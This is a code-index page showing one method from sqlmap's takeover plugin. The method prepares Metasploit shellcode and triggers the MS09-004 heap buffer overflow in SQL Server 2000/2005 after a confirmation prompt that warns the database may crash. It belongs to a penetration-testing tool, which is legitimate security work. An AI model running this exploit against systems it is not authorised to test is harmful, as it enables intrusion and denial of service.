MCPcopy Index your code
hub / github.com/sqlmapproject/sqlmap / osBof

Method osBof

plugins/generic/takeover.py:333–356  ·  view source on GitHub ↗
(self)

Source from the content-addressed store, hash-verified

331 self.smb()
332
333 def osBof(self):
334 if not isStackingAvailable() and not conf.direct:
335 return
336
337 if not Backend.isDbms(DBMS.MSSQL) or not Backend.isVersionWithin(("2000", "2005")):
338 errMsg = "the back-end DBMS must be Microsoft SQL Server "
339 errMsg += "2000 or 2005 to be able to exploit the heap-based "
340 errMsg += "buffer overflow in the 'sp_replwritetovarbin' "
341 errMsg += "stored procedure (MS09-004)"
342 raise SqlmapUnsupportedDBMSException(errMsg)
343
344 infoMsg = "going to exploit the Microsoft SQL Server %s " % Backend.getVersion()
345 infoMsg += "'sp_replwritetovarbin' stored procedure heap-based "
346 infoMsg += "buffer overflow (MS09-004)"
347 logger.info(infoMsg)
348
349 msg = "this technique is likely to DoS the DBMS process, are you "
350 msg += "sure that you want to carry with the exploit? [y/N] "
351
352 if readInput(msg, default='N', boolean=True):
353 self.initEnv(mandatory=False, detailed=True)
354 self.getRemoteTempPath()
355 self.createMsfShellcode(exitfunc="seh", format="raw", extra="-b 27", encode=True)
356 self.bof()
357
358 def uncPathRequest(self):
359 errMsg = "'uncPathRequest' method must be defined "

Callers 1

actionFunction · 0.80

Calls 11

isStackingAvailableFunction · 0.90
readInputFunction · 0.90
isDbmsMethod · 0.80
isVersionWithinMethod · 0.80
getVersionMethod · 0.80
infoMethod · 0.80
initEnvMethod · 0.80
getRemoteTempPathMethod · 0.80
createMsfShellcodeMethod · 0.80
bofMethod · 0.80

Tested by

no test coverage detected